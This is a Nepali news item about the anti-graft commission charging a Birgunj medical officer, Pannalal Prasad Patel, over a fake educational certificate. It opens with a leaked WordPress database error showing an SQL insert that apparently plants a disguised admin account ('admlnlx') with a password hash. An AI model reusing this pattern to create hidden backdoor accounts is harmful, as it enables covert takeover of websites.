WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4ZEZlpU3na0377Zf/B4Qsh39FTkNr/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 11:48:56', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस ११–
अख्तियार दुरुपयोग अनुसन्धान आयोगले नक्कली शैक्षिक योग्यताको प्रमाणपत्र पेस गरी जागिर खाएका भनिएका मेडिकल अधिकृत पन्नालालप्रसाद पटेलविरुद्ध आरोपपत्र दायर गरेको छ ।
नारायणी उपक्षेत्रीय अस्पताल, वीरगन्जमा कार्यरत पटेलका सम्बन्धमा छानबिन गर्दा निजले आइएस्सी तहको नक्कली शैक्षिक योग्यताको प्रमाणपत्र पेस गरी नेपाल मेडिकल काउन्सिलबाट सदस्यतासमेत प्राप्त गरी जागिर खाएको देखिएको आयोगको जिकिर छ । ‘निजको प्रमाणपत्र छानबिन गर्दा झुठा देखिएकाले’ आयोगले आज विशेष अदालतमा आरोपपत्र दायर गरेको हो ।